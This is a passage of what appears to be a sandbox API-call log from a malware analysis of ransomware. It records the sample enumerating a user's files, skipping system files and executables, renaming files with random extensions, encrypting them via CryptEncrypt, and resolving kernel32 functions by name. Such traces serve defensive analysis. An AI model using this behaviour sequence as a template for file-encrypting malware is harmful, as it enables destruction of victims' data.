(in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.158] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.158] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.158] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.158] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fnxRi.avi") returned 46 [0087.158] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fnxRi.avi.F1jPeJ") returned 53 [0087.158] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fnxRi.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fnxri.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fnxRi.avi.F1jPeJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fnxri.avi.f1jpej"), dwFlags=0x0) returned 1 [0087.158] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.159] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.159] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.159] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28edaa00, ftCreationTime.dwHighDateTime=0x1d4d593, ftLastAccessTime.dwLowDateTime=0xb0882600, ftLastAccessTime.dwHighDateTime=0x1d4c582, ftLastWriteTime.dwLowDateTime=0xb0882600, ftLastWriteTime.dwHighDateTime=0x1d4c582, nFileSizeHigh=0x0, nFileSizeLow=0x11a26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hpZUuiDNUpxuJrBS.flv", cAlternateFileName="HPZUUI~1.FLV")) returned 1 [0087.159] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv", lpString2="DECRYPT-FILES.txt") returned 1 [0087.159] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv", lpString2="autorun.inf") returned 1 [0087.159] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv", lpString2="boot.ini") returned 1 [0087.159] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv", lpString2="desktop.ini") returned 1 [0087.159] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv", lpString2="ntuser.dat") returned -1 [0087.159] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv", lpString2="iconcache.db") returned -1 [0087.159] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv", lpString2="bootsect.bak") returned 1 [0087.159] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv", lpString2="ntuser.dat.log") returned -1 [0087.159] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv", lpString2="thumbs.db") returned -1 [0087.159] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv", lpString2="Bootfont.bin") returned 1 [0087.159] lstrlenW (lpString="hpZUuiDNUpxuJrBS.flv") returned 20 [0087.160] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0087.160] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0087.160] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0087.160] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0087.160] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.160] lstrlenW (lpString="hpZUuiDNUpxuJrBS.flv") returned 20 [0087.160] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.160] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="hpZUuiDNUpxuJrBS.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hpZUuiDNUpxuJrBS.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hpZUuiDNUpxuJrBS.flv" [0087.160] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.160] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hpZUuiDNUpxuJrBS.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hpzuuidnupxujrbs.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.160] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=72230) returned 1 [0087.160] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.160] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.160] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.160] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.161] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.161] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.161] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0087.162] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.162] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.163] CloseHandle (hObject=0x414) returned 1 [0087.163] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.163] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.164] CloseHandle (hObject=0x0) returned 0 [0087.164] CloseHandle (hObject=0x410) returned 1 [0087.164] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.165] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.165] GetTickCount () returned 0x114e3ca [0087.165] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.165] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.165] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.165] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.166] lstrlenA (lpString="kernel32.dll") returned 12 [0087.166] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.166] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.166] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.166] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.166] lstrlenA (lpString="ADDATOMA") returned 8 [0087.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.166] lstrlenA (lpString="ADDATOMW") returned 8 [0087.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.166] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.166] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.166] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.166] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.166] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.166] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.166] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.167] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.167] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.167] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.167] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.167] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.167] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.167] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.167] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.167] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.167] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.167] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.167] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.167] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.167] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.167] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.167] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.167] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.167] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.168] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.168] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.168] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.168] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.168] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.168] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.168] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.168] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.168] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.168] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.168] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.168] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.168] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.168] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.168] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.168] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.168] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.169] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.169] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.169] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.169] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.169] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.169] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.169] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.169] lstrlenA (lpString="BEEP") returned 4 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.169] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.169] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.169] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.169] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.169] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.169] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.169] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.170] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.170] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.170] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.170] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.170] lstrlenA (lpString="CANCELIO") returned 8 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.170] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.170] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.170] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.170] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.170] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.170] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.170] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.170] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.170] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.170] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.170] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.170] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.170] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.171] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.171] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.171] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.171] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.171] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.171] lstrlenA 